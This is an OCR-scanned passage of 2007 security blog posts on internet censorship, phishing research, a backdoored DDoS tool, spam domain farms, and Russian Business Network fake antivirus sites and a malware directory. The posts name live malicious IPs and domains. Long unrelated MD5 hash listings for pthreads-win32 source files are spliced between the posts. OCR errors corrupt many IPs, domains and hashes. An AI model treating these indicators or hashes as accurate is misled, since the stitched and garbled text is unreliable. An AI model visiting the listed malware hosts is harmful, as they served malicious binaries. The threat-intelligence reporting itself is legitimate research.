8 
9 


ttp://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample.htm 


. http: //ddanchev. blogspot .com/2007/08/bank- of - india-serving-malware.htm 
. http: //ddanchev. blogspot .com/2007/09/google-hacking-for-mpacks-zunkers-and.htm 
. http: //ddanchev. blogspot .com/2007/10/compromised-sites-serving-malware-and.htm 


3.10.19 Everyone’s Guide to By-Passing Internet Censorship (2007-10-19 13:58) 


START HERE & 


EVERYONE'S GUIDE TO BY-PASSING INTERNET CENSORSHIP 


Following the recently released "[1]Journey to the Heart of Internet Censorship" report, 
[2]University of Toronto’s Citizen Lab took advantage of the momentum and released a guide 
entitled "[3]Everyone’s Guide to By-Passing Internet Censorship" : 


"This guide is meant to introduce non-technical users to Internet censorship circumvention 
technologies, and help them choose which of them best suits their circumstances and needs." 
Here’s another interesting perspective that took event recently, the art of [4]using censorship 
for economic warfare by stealing Internet traffic from the U.S and forwarding the loyal visitors 
to local Internet properties in China : 


"I’ve written previously on the possibility that China may use its firewall as an economic 
tool as opposed to a censorship tool alone, and although censorship may be partially behind 
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todays blanket ban of US search sites, the redirect to Baidu would indicate an economic 
motive; if the Chinese Government were serious about censorship alone we would have 
reports of page not found/ blocked messages, not redirects to Baidu." 


[5]It’s all a matter of perspective - privacy is just as vital to maintain in a democratic 
society, as is anonymity in a modern communism societies where f*** speech is a censored 
word by itself. 


1. http: //ddanchev. blogspot .com/2007/10/journey-to-heart-of-internet-censorship.htm 


2. http://citizenlab. org/modules . php? op=modload&name=Newskfile=articleksid=1319 


3. http://deibert.citizenlab. org/Circ_guide.pdf 


4. http: //www.techcrunch.com/2007/10/18/cyberwar-china-declares-war-on-western-search-sites/ 


5. http: //ddanchev. blogspot .com/2006/01/anonymity-or-privacy-on-internet .htm 


3.10.20 eCrime Researchers Summit 2007 - Papers Available (2007-10-19 15:09) 
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Some informative papers covering various aspects of analyzing and protecting against phish- 
ing attacks were made available at the beginning of this month, courtesy of [1]this year’s 
APWG eCrime Researchers Summit : 


"The Anti-Phishing Working Group eCrime Researchers Summit was conceived by APWG 
Secretary General Peter Cassidy in 2006 as a comprehensive venue for the presentation of the 
state-of-the-art basic and applied research into electronic crime, engaging every aspect of its 
development (technical, behavioral, social and legal) as well as technologies and techniques 
for its detection, related forensics and its prevention." 


Papers presented include : 


- [2]Examining the Impact of Website Take-down on Phishing 

- [3]Fishing for Phishes: Applying Capture-Recapture to Phishing 

- [4]Evaluating a Trial Deployment of Password Re-use for Phishing Prevention 
- [5]Behavioral Response to Phishing Risk 

- [6]Fighting Obfuscated Spam 

- [7]A Comparison of Machine Learning Techniques for Phishing Detection 

- [8]Getting Users to Pay Attention to Anti-Phishing Education 
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http: //www.ecrimeresearch.org/2007/program.htm 


http: //www.ecrimeresearch.org/2007/proceedings/p1_moore. pdf 


http: //www.ecrimeresearch.org/2007/proceedings/p14_weaver.pd 


Kh 


http: //www.ecrimeresearch.org/2007/proceedings/p26_florencio. pdf 


http: //www.ecrimeresearch.org/2007/proceedings/p37_downs.pdf 


http: //www.ecrimeresearch.org/2007/proceedings/p45_liu. pdf 


http: //www.ecrimeresearch.org/2007/proceedings/p60_abu-nimeh. pd 


PN AMARWNE 


, 


. http: //www.ecrimeresearch.org/2007/proceedings/p70_kumaraguru. pdf 


3.10.21 Random Flickr Jewel - Hold it Right There! (2007-10-20 22:41) 


[1 


—_— 


If you don’t respect your privacy, or at least put efforts into preserving it - you don’t deserve 
any, it’s simple. [2]Great shot courtesy of [3]floze. 


1. http://farm3.static.flickr.com/2322/1588186509_9926322389. jpg?v=1192557576 


2. http://flickr.com/photos/floze/1588186509/ 
3. http://flickr.com/photos/floze 
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3.10.22 China’s Cyber Warriors - Video (2007-10-21 21:17) 


Originally aired on Discovery Channel, this [1]documentary on Chinese hackers is worth watch- 
ing in the wake of the recent speculations of [2]Chinese cyber warriors probing the networks of 
numerous governments across the globe. All warfare is based on deception, especially [3]peo- 
ple’s information warfare. 


1. http: //video. google. com/videoplay?docid=5292321985016128434 
2. http: //ddanchev. blogspot .com/2007/09/chinas- cyber-espionage-ambitions.htm 


3. http: //ddanchev. blogspot .com/2007/10/peoples-information-warfare-concept.htm 


3.10.23 Empowering the Script Kiddies (2007-10-22 23:09) 
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DAMN IT ! 


What are the chances tools like these, even this one in particular were distibuted to the masses 
during the [1]Russia vs Estonia DDoS attacks to achieve a full scale [2]people’s information 
warfare effect? Too high not to state it as a fact. What’s interesting about this tool is that the 
authors behind it backdoored it, and so whenever an enthusiastic wannabe hacktivist loads 
it on her way to DoS a site, a connection to a predefined IRC server opens up providing the 
authors behind the tool with access to the host. Ironic and [3]bandwidth greedy. 


DDoS attacks happen inside Russia too, compared to the inside-to-outside stereotype 


only. The most recent case of hacktivism in the form of a DDoS attack is for instance the 
attack on [4]Politcom.Ru Information and Analytic. Summary [5]in English : 
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"Politcom.Ru Information and Analytic site operations have been halted because of in- 
tensive DDoS-attacks. The attacks started on October, 12th and lasted for six days with 
various intensity. The hosting support service has undertaken attempts to resume the site 
operations tree-four times a day. But in several hours the attacks would resume. The change 
of the hosting provider IP-address did not give any positive results, as the attacks removed 
from the old IP-address to the new one." 


http://www. imedialearn.com/imediapoll/poll . php?code=f 1156c39d3c972139c62bc91c17e2c5 


1. 
2. 
3. 
4. 
Di 


3.10.24 Introducing Jiglu - Tags That Think (2007-10-23 02:59) 
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With the idea to make this blog easier to read and much more interactive at the same time, I’m 
happy to let you know that I’ve just tested an incredibly well performing service called [1]Jiglu : 


"a super-smart engine that pieces your site together, intelligently tagging and linking 
your web content" 


Here’s [2]the tag cloud, and these the [3]topic categories for easier navigation. The ser- 
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vice is very handy when browsing the archive of a specific month, or the main index itself, in 
fact, it’s bringing new perspectives to every post. Enjoy! 


1. http://jiglu.com/ 
2. http: //ddanchevi-tagging. jiglu.com/tags/!overla 
3. http: //ddanchev1-tagging. jiglu. com/tags/topics/!overla 


3.10.25 Ain’t That Ugly? (2007-10-23 03:52) 


During the weekend | stumbled upon a [1]herbal enlargement domains farm hosted on a single 
IP (210.52.223.26) on their way to start the spam campaign. Earlier this month, in exactly the 
same fashion | assessed [2]a Rock Phish domains farm you may also be interested in taking a 
look at. Scammy, scammy. 


http://195.210.38.41:2082/f11e01/231007/1193105212/herbal_spam_domains.txt 


1. 
2. http: //ddanchev. blogspot .com/2007/10/assessing-rock-phish-campaign.htm 
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pthread key _delete.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _kill.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _getkind _np.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _getpshared.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr gettype.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread mutexattr _init.c.svn-work 
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11340 


202977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _destroy.c.svn-work 
202977d1c96f487abe4ale202dd03b4e 


pthread rwlockattr getpshared.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlockattr _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


pthread rwlockattr setpshared.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
pthread rwliock _destroy.c.svn-work 
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2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwlock _timedwrlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _rwiock _tryrdlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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pthread setschedparam.c.svn-work 
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pthread spin _unlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
pthread _testcancel.c.svn-work 
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ptw32 _getprocessors.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 increase semaphore.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _InterlockedCompareExchange.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 is _attr.c.svn-work 
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3.10.26 RBN’s Fake Security Software (2007-10-23 14:36) 


[Blacklisted |iP Address [NameServer _|NameServer2__[NameServer3_[Mail Sever__| 
| 1 |adwareremoverzoo7.com | v__|203.121.7955 _|203.117.175.116 |2os1zi79ss_ | | 69.50.267.172 _| 
| 2 |antispyeonecom |v _—fs.255.118.162 |195.3.10477 |as.2ss.iza162_| | s.255.118.162_| 
| 3 [antiverminscom | v.__—fs.255.119.66 _|0s.255.119.66__|a5.255.119.67_|81.95.145.186 _|a5.255.119.66_| 
| 4 |antiverminsernet_ | v.__—fs.255.119.66 _|as.255.119.66__|a5.255.119.67 __|s195.145186 | 
| 5 |antiverminspronet__—|_—v._—fs.255.119.66 _|as.255.119.66 _|a5.255.119.67 __|s195.1451e6 | 
| 6 |matwareatarmcom —|_—v._—fi.29.269.38__[ei.20.20.38 _|i.95.14¢.182 _|203.121.7955 __|69.50.167.172_| 
| 7 |matwarewipecom i |_—v.__(f85.255.116.202 |195.225.176.68 _|69.31.93.162 __|195.225.176.76_|85.255.116.202_| 
| 8 |sigmacodebiz | x___—fnt.t92.1062 | e5.255.117.205 |oris21061_|er9s.sasie6 | 
| 9 |spvexebiz |v _95.225.176.68 |195.225.176.68 |69.31.93.162 __|195.225.176.76_|195.225.176.68_| 
[| 10 |spydawn.com |v 5.255.119.125 ]ei95.1a5.186 |195.3.146.30 _|85.255.119.254_|85.255.119.125 | 
[11 |spyiockedcom |v _5.255.12050_]195.3.108.77 _|1.95.145.186 _|85.255.114.202_|85.255.12050__| 
[12 |spyshreddercom |v a.29.249.38 Jeres.iasie2 | | 203.121.7955 |69.50.167.172 _| 
| 13 |spyshredderscannercom | v_[i.29.249.208_|ei29.249.208 |ei.025072_ | 69 50.267.172 | 
| 14 |thecteanersystemcom | v__—fsn.29.249.38[ei.29.209.38 _|203.117.175.116 |203.121.7955 _|69.50.167.172 _| 
| 15 |virusburstcom |x ——foa.t9z.to6a fon.tsz1061 |eras2i061 | [9 5.225.177.54 | 
| 16 |virusprotectprobiz |—x___—ifn.asz.1062 fi95.3.10477 __|ei.95.14s.is6 |orie21061 | 
[17 |virusprotectpro.com |v _fas.255.117.205 |195.3.1¢8.77 __|e1.95.145.186 _|[91.192.106.1__|85.255.117.205_| 
| 18 |virusraycom |v _—f5.255.119.126 |05.255.117.205 _|91.192.106.1 _|81.95.145.186 _|@5.255.119.126 _| 
| 19 |witdgadgetsibiz |x __—ifsn.tg2.1062 |195.3.100.77 _|ei.9s.14s.186 |as.2ss.114202 | 


| 20 |windowsafesurfcom | =~ x ~——| 203.117.175.116 }203.117.175.116 |2031217955 | | 203.117.175.116 
Table 1. - Notes: 
1. Blacklisting for core IP address - ref: Spamhaus SBL, XBL 2007 rbnexploit.blogspot.com 


(all within McAfees Site Advisor as “Red X") 


In need of a good example of coordinated [1]CYBERINT so that enough data is gathered before 
the domains stop responding or get transfered to a network not belonging to the Russian Busi- 
ness Network? Try this one. Yesterday, the [2]RBN monitoring blog picked up the [3]fake anti 
virus and spyware applications | covered in a previous post, and came up with a great table of 
[4]20 fake anti virus and anti spyware applications hosted at the RBN. 


1. http: //ddanchev. blogspot . com/2006/09/cyber-intelligence-cyberint .htm 
2. http://rbnexploit.blogspot.com/ 
3. http://ddanchev. blogspot .com/2007/10/russian-business-network.htm 


4. http://rbnexploit .blogspot .com/2007/10/rbn-top-20-fake-anti-spyware-and-anti.htm 
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2d2977d1c96f487abe4ale202dd03b4e 


ptw32 mutex _check _need __init.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _new.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processlnitialize.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _processTerminate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _reuse.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _rwlock _cancelwrwait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 


ptw32_rwlock _check _need __init.c.svn-work 


20d2977d1c96f487abe4ale202dd03b4e 


ptw32_spinlock check _need _init.c.svn-work 


2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _threadDestroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 __threadStart.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _throw.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _timespec.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocCreate.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
ptw32 _tkAssocDestroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
rwlock.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
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sched _getscheduler.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched get priority _max.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched get _priority_min.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched _setscheduler.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sched _yield.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
semaphore.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
semaphore.h.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _close.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _destroy.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _getvalue.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _init.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _open.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _post _multiple.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _timedwait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _trywait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _unlink.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
sem _wait.c.svn-work 
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202977d1c96f487abe4ale202dd03b4e 
signal.c.svn-work 
202977d1c96f487abe4ale202dd03b4e 
spin.c.Svn-work 
202977d1c96f487abe4ale202dd03b4e 
sync.c.svn-work 
202977d1c96f487abe4ale202dd03b4e 
tsd.c.svn-work 
202977d1c96f487abe4ale202dd03b4e 
w32 _CancelableWait.c.svn-work 
2d2977d1c96f487abe4ale202dd03b4e 
attr.c.svn-base 
a12fd4f3434414899195949439858f6f 
barrier.c.svn-base 
532880d3bdd9ef36301d6e7b6aa00d50 
cancel.c.svn-base 
5b13ba000273861c27b9aa50f8bdfc14 
cleanup.c.svn-base 
769e83413dd9bd33f9e1c81f32b761e2 
condvar.c.svn-base 
302b1c985cad6f88f933b22b3ec74099 
create.c.svn-base 
6b0ab4004Ff70c7f20f8f1ad65aa6133e 
dil.c.svn-base 
f08714dcbfeaa5e15b142cff5d123beb 
errno.c.svn-base 
c147795e0a23dac6df29f2546070f789 
exit.c.svn-base 
d9942ff4e0c679aa9c76bec49172a4cf 
fork.c.svn-base 
1097a7c18d03a652f6ea2f804f0ccda9 
global.c.svn-base 
0f2567eb987e512d0e0ef6e540d176e7 
implement.h.svn-base 
0369b8562d00680c8dd5659476b51a67 
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misc.c.svn-base 
f455f6fd65b4a2935alel9bca95abff7 
mutex.c.svn-base 
cc91625546ca948b067ea08191ed8355 
need _errno.h.svn-base 
lacf999ab5165cbb7c0b407eaeb0591d 
nonportable.c.svn-base 
476e3132b026ce2915f98e505201a129 
private.c.svn-base 
ac1286d19f9cffded56c450b000d1802 
pthread.c.svn-base 
71e897b73aa86844be42cce3468991a4 
pthread.h.svn-base 
c4add0a9376ea64a2723ca3e2c18fcb6 
pthread attr _destroy.c.svn-base 
5e4c09cc1f07894c258e7adec89ae071 
pthread attr _getdetachstate.c.svn-base 
a5e3409db651914787d3bbdefdcc02b5 
pthread attr _getinheritsched.c.svn-base 
8995dfécdeb495fdc3c83b3bb000b92c 
pthread attr _getschedparam.c.svn-base 
4f5fdfdbf333c6012e8f36823393e690 
pthread attr _getschedpolicy.c.svn-base 
fecb499c80d985bd5aadb8cc7e33bb91 
pthread attr _getscope.c.svn-base 
69a7c47942a9e4b3d7d982a5fa8cf9I60 
pthread attr _getstackaddr.c.svn-base 
b26f339cc1f4b7d00174c4443c1223d7 
pthread attr _getstacksize.c.svn-base 
d5288657f20f8ed763b8f4e9afe43f2e 
pthread attr _init.c.svn-base 
683a5952e5821df2d6a7ce661691ad20 
pthread attr _setdetachstate.c.svn-base 
ddca6b89174eec5513af486559a31cb2 
pthread attr _setinheritsched.c.svn-base 
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aed7307ebaee866b38f8e2fe9dca4fa9 
pthread attr setschedparam.c.svn-base 
22020c1fdd0ed05b269d751ca8f4el1le0 
pthread attr setschedpolicy.c.svn-base 
ba1891657e9a567446694b7d025123ba 
pthread attr _setscope.c.svn-base 
5fa4c254568e731f68b0bc804f87fa3d 
pthread attr setstackaddr.c.svn-base 
0248c3bb0e55786d74ee6e428023650a 
pthread attr setstacksize.c.svn-base 
25b81793cca5ec56ccdfbf6004e4ce2d 
pthread _barrierattr destroy.c.svn-base 
cdaa8194ef98c88298e9277210793ea4 
pthread _barrierattr getpshared.c.svn-base 
2f263156b646ea06ae1b569f00c6a344 
pthread _barrierattr _init.c.svn-base 
31432811af847573ccc8fecb493f350c 
pthread _barrierattr setpshared.c.svn-base 
71c0fd0c4905af258c6d72b3a7a7d4f9 
pthread barrier destroy.c.svn-base 
2d6749b68bba4ddd14al1l1lfec6992f40e 
pthread _barrier _init.c.svn-base 
700c479c972829bd6ea179c73ea5c8C9 
pthread barrier _wait.c.svn-base 
b23c55539d7728e5004e8a24caed970c 
pthread _cancel.c.svn-base 
886ec808148ff513ff19d853836964d4 
pthread condattr _destroy.c.svn-base 
cfe75ef2c8eddf86ec66af3299a86458 
pthread condattr _getpshared.c.svn-base 
d03841c90360c8cad64d37d29ffcc2fe 
pthread condattr _init.c.svn-base 
cfe50232c1cf889825700d356cc0870c 
pthread condattr setpshared.c.svn-base 
d99ec12d6779ff6bd951351ec21e9621 
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pthread cond _destroy.c.svn-base 
8d991laa0a08b09fd992f023e14c3e551 
pthread cond _init.c.svn-base 
19697294947a0a79ad838ff8d6f2a4e2 
pthread cond _signal.c.svn-base 
a926b0c51410ae6dc34fc7ca65a09d99 
pthread cond _wait.c.svn-base 
6799a3f349588f383533b8e4ele6e6f8 
pthread delay _np.c.svn-base 
7cee60522a639b962d514eCc067504127 
pthread detach.c.svn-base 
c70e762ea975c95e099c6b00a15d744e 
pthread equal.c.svn-base 
0dd48879e326a289df907cal6db15fde 
pthread _exit.c.svn-base 
ae0a03587f9635efdbb460fd7eae5l1lea 
pthread _getconcurrency.c.svn-base 
5d48952efe0428532d0f848625c7achbe 
pthread _getschedparam.c.svn-base 
fb89a4d06071fc673e64fbd920b30b74 
pthread _getspecific.c.svn-base 
66a89f4ce67f35e5e66e7ab6ad81ef683 
pthread getw32threadhandle _np.c.svn-base 
d342ea56f7c739a9e96c802376a5512e 
pthread join.c.svn-base 
8acb6b50a9ff021c671f9d31086d5a51 
pthread key create.c.svn-base 
54e948d2dccf88469c42adcb8ab6e6262 
pthread key delete.c.svn-base 
e661148ddc3a5d1060ea6ed17016c358 
pthread _kill.c.svn-base 
5afa88a135efe3d129307cab947797d3 
pthread mutexattr destroy.c.svn-base 
801e0539a7aa21fel2eae0440f6c112f 
pthread mutexattr _getkind _np.c.svn-base 
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8fe3f1b326fce135857b89812a65f0ca 
pthread mutexattr _getpshared.c.svn-base 
Oeb5d639acd44f3f27e708bd63c4d960 
pthread mutexattr_gettype.c.svn-base 
0d36b0b667e733bc189419eaf24058d7 
pthread _mutexattr _init.c.svn-base 
0ba2b45d35880a964fa6f2493eb360ff 
pthread mutexattr setkind _np.c.svn-base 
bf90b30106c4b302ce9a5fb2fb3e4d68 
pthread mutexattr setpshared.c.svn-base 
660c267e5fb3f635ed2b65cdd8ed3f04 
pthread mutexattr _settype.c.svn-base 
3bc9aafc4f4a558b0ab5b8b432103197 
pthread mutex _destroy.c.svn-base 
8223329a896655f6d712074942c9e3eb 
pthread _mutex _init.c.svn-base 
ad448b005f9ceb45d480e3c30ff4071F 
pthread mutex _lock.c.svn-base 
3f2472d8404e683eed467fad157ead37 
pthread mutex _timedlock.c.svn-base 
4207d8ca7648fd827d0f3359325c3bdb 
pthread mutex _trylock.c.svn-base 
5df4888fe32e44eae80ebf514042ccf9 
pthread mutex _unlock.c.svn-base 
€8b425b17c9d75207e7b22480ae7f129 
pthread num _processors _np.c.svn-base 
daf0c08c4048a2117a71le8lec5fcbccl 
pthread _once.c.svn-base 
700a39e696322589fac2598627c71e60 
pthread _rwlockattr _destroy.c.svn-base 
d1b34b57f886c13f0c662f6e7f085045 
pthread _rwiockattr getpshared.c.svn-base 
bff28c4c6f089cdc3516393316465707 
pthread _rwlockattr _init.c.svn-base 
f73d91e80c6e204f65173deeld56ebee 
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pthread rwlockattr setpshared.c.svn-base 
fd231f3c35d8c998cab61ab49714ef24 
pthread _rwlock _destroy.c.svn-base 
43d661flcefelda4290f4518917fc851 
pthread _rwlock _init.c.svn-base 
820flbb7bd12aa24a823f2fbfcd13d0a 
pthread _rwlock _rdlock.c.svn-base 
2324cf9542740dd7eefcal0f0b69552a 
pthread rwlock _timedrdlock.c.svn-base 
673b434b4953cb594ea4deab6e512990d 
pthread rwlock _timedwrlock.c.svn-base 
0541d083166be307e58ca21fca47416c 
pthread rwlock _tryrdlock.c.svn-base 
4baa4a2626965b7adf412e5984a34a58 
pthread rwlock _trywrlock.c.svn-base 
838b51c2f629c01ed8951f5 7 bb68ff23 
pthread rwlock _unlock.c.svn-base 
0e3709646dd2611d29979e37c414fc61 
pthread rwlock _wrlock.c.svn-base 
f5fb818049a82ba150323fea4fcae096 
pthread _self.c.svn-base 
27428a844444dc65b3839ad50eb49da5 
pthread _setcancelstate.c.svn-base 
83cfd164085256ca9bd55d176b561b4a 
pthread _setcanceltype.c.svn-base 
c1b8f99c725652cfa324f33b0107f52a 
pthread _setconcurrency.c.svn-base 
063d0748d3c76e8efd5cd2d905b9f894 
pthread _setschedparam.c.svn-base 
e6dbd63f60f3663c59db44508f6755ca 
pthread _setspecific.c.svn-base 
922ff50b089afc2995b73692de176866 
pthread spin _destroy.c.svn-base 
d9bd2d5159ee30d97c47f6455c6b66b2 
pthread spin _init.c.svn-base 
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b5daa9bf63094a8d4c0821df8c262db5 
pthread spin _lock.c.svn-base 
32820ded10fc73c8946b67f96e4dd659 
pthread spin _trylock.c.svn-base 
75d5e2c4a32a61e52b8870481fec9e10 
pthread spin _unlock.c.svn-base 
464e81862391dfd3f023cd208d1138e7 
pthread _testcancel.c.svn-base 
79597a0d52eddebdea37b23c62c5130a 
pthread timechange handler _np.c.svn-base 
41a050a032b61dc38a2950374ba7413b 
pthread win32 attach detach _np.c.svn-base 
e7dfc38f3730337de6bb6eb17254e621 
ptw32 _calloc.c.svn-base 
8d46d098473072b1a2bf1899000265e8 
ptw32 __callUserDestroyRoutines.c.svn-base 
b3624eb0ba9cf49ff4f5253ebfcbbee6 

ptw32 cond check _need _init.c.svn-base 
cad661495450f8f36f03e902394cd74b 
ptw32 decrease semaphore.c.svn-base 
956148b6e8b6da0d0f28aa81leda21a86 
ptw32 _getprocessors.c.svn-base 
08d377c212d3b4185cb71846e72f6497 
ptw32 increase semaphore.c.svn-base 
6c41079c1baa308f0578c0b3768953f1 
ptw32 _InterlockedCompareExchange.c.svn-base 
32bb362fle8e0987e07c9bf4e4baa721 
ptw32 is _attr.c.svn-base 
29a06dc770445ca530459d82969cf9eb 
ptw32 mutex check _need __init.c.svn-base 
9e5d9e472eCc22775a9b2b0c627411720 
ptw32 _new.c.svn-base 
181ccfl1lcaf2724717f4d27d45988375 
ptw32 __processlnitialize.c.svn-base 
ab6a647deaf72f10d7eb71f480a6b007 
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ptw32 _processTerminate.c.svn-base 
3d61065810159c1f10526b6c9b81bf55 
ptw32 _reuse.c.svn-base 
fcaa8e0fcf7a4c8406955b3alb09ffe3 
ptw32 _rwlock _cancelwrwait.c.svn-base 
eaaf7ef0b825c610b8968380el1a08bdc 
ptw32 _rwlock check _need _init.c.svn-base 
fal94f24105f6d03f776d75df4ce4c2f 
ptw32 spinlock check _need _init.c.svn-base 
e2cf649b117eb37bb36e0ed227afcf00 
ptw32 _threadDestroy.c.svn-base 
2a232cfc406e839ffd7fe2efc0a22198 
ptw32 _threadStart.c.svn-base 
7172fe7956491df4b56ea26acb026083 
ptw32 _throw.c.svn-base 
a967b990c02689c2a0102666c91e0370 
ptw32 _timespec.c.svn-base 
17d7f054e0f26c3a0c8aee49c958bdaa 
ptw32 _tkAssocCreate.c.svn-base 
9f6cf981be1042382e2664651003b792 
ptw32 tkAssocDestroy.c.svn-base 
9f69b2ae2fd454a3dff967alf68f88df 
rwlock.c.svn-base 
6c39e3f7f9caflc8046f9ee942a88f40 
sched.c.svn-base 
e5a560618fbd7bdd9d6a2ccfeee5cb14 
sched.h.svn-base 
9bf8b221a478f29e4ba542ac4c7c77ee 
sched _getscheduler.c.svn-base 
a5bfa4cfc9db0526ac1308b0f5bf1280 
sched _get _priority __max.c.svn-base 
66dee8363b55d0189924e212e8855cda 
sched _get _priority _min.c.svn-base 
983129b53a87d8cf410ab829e4613ae8 
sched _setscheduler.c.svn-base 
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3.10.27 Over 100 Malwares Hosted on a Single RBN IP (2007-10-23 23:45) 


Index of /ms 


Name Last modified Size Description 

PF Parent Directory 

B) 001. exe 26-Feb-2007 20:10 45K 
2) 006.exe 28-Feb-2007 04:09 38K 
2) OLO1OL0Lexe 05-Mar-2007 11:47 28K 
#) O11 exe 28-Feb-2007 11:33 43K 
B) Lexe 04-Jan-2007 18:59 RIK 
[&) t.php 04-Dec-2006 00:36 23 
? Luror 16-Jan-2007 16:59 37K 
BD) 33x 29.Mar-2007 14:47 33K 
B) 101 exe 02-Jan-2007 17:32 42K 
BY 1303.ex 13-Mar-2007 05:49 17K 
2) 1304 exe 16-Apr-2007 09:57 19K 
B) 171717-instexe 05-Mar-2007 11:48 105K 
Bi) 452225 ene 17-Feb-2007 08:36 9.4K 
2) 1663800.exe 16-Jan-2007 17:12 39K 
B) 21212121 -instexe 06-Mar-2007 11:53 105K 
a) TVTTTTIIITITI77777 -instexe 13-Mar-2007 14:27 105K 
#) lustallerexe 12-Feb-2007 19:38 9.4K 
#) bho.exe 17-Apr-2007 10:02 230K 
#) bho6.ext 21-Nov-2006 22:41 SIK 
B) blagodat? -inst.exe 29.Mar.2007 07:06 106K 
#) botexe 19-Sep-2006 18:32 69K 
BN het vt? 24 exe NA.Mar.2007 149? WK 


The never ending Russian Business Network’s saga on whether or not they host malware on 
behalf of their customers enters in an entirely new phrase with the discovery of over 100 
malwares hosted on a single IP - 81.95.149.51/ms where the directory listing indicates that the 
earliest binary was uploaded on 19-Sep-2006 and the most recent one on the 28-May-2007. 
If only was the directory listing denied we would only be speculating on such a development, 
and as it’s obvious that it isn’t sooner or later they’ll simple rename the directory as they 
apparently did in the past from 81.95.149.51/ms21 to 81.95.149.51/ms51 and to the current 
state. 


Meanwhile, there’s an [l]lactive mass mailing campaign going on in the [2]time of blog- 
ging, that’s [3]exploiting the recent mailto PDF vulnerability. Guess where does the PDF file’s 
payload point to? [4]The Russian Bussiness Network, again, again and again. 


1. http: //blogs.zdnet .com/security/?p=605 

2. http://isc.sans.org/diary.html?storyid=353 

3. http://seclists.org/fulldisclosure/2007/Oct/0730.htm 
4. 

A 


http: //ddanchev. blogspot .com/2007/10/russian-business-network.htm 
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e€4777€94623814eb0b216a41eb5776b4 
sched _yield.c.svn-base 
a399aba13412a46fa8e83854ecae8357 
semaphore.c.svn-base 
07fc784f1569d63731270ac84e1065d0 
semaphore.h.svn-base 
90f547b8d8b3ea2b7793960e1708eff6 
sem _close.c.svn-base 
36cfe46bf222eb5ff265e7ed3026b7b8 
sem _destroy.c.svn-base 
47ad61c6b2b306dfbc43650699a30128 
sem _getvalue.c.svn-base 
12afd6893abldbf8d1fal70473e6c8f4 
sem __init.c.svn-base 
a24f7f807ba68cb75059fd344b3bc214 
sem _open.c.svn-base 

85492 7f98fb2be2cd8b7abe2908e39e0 
sem _post.c.svn-base 
d6dcadad29390df5010a0cbd936d18d9 
sem _post _multiple.c.svn-base 
7117a693be7d93f961d4147422fe6634 
sem _timedwait.c.svn-base 
2a926dd822c8944a299e1bd7b3302fd3 
sem _trywait.c.svn-base 
0204ebf15630d456472396c3f6b42b79 
sem _unlink.c.svn-base 
9128ef69f0f8b8c0920ae4380d3cc939 
sem _wait.c.svn-base 
816f33725f02310a446ea64ffcfaaba6 
signal.c.svn-base 
fe630082ffba5785f007fb8c759a19e2 
spin.c.svn-base 
6d6b2cfef6922a823438ad555f263279 
sync.c.svn-base 
446c403c1c5ecbb19d6a3db57d98eca9 
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tsd.c.svn-base 
69c39e05b8f45b3be5e233c7600adf18 
w32 _CancelableWait.c.svn-base 
c7acc65c8be2d6723574b0851a7b69c3 
global.h 650888a1590d495c8dcc59569f6839a0 
md5.h 
92bc91ca9f387209188fa316a4ab9405 
md5c.cpp 7023d118e4970f3630d9aa0acdd0f6b4 
empty-file 

entries 
8722aa0d76368d67368624ad6fda23fe 
format 
48a24b70a0b376535542b996af517398 
README.txt 
feca2dee1d85784dc846dbac3f878670 
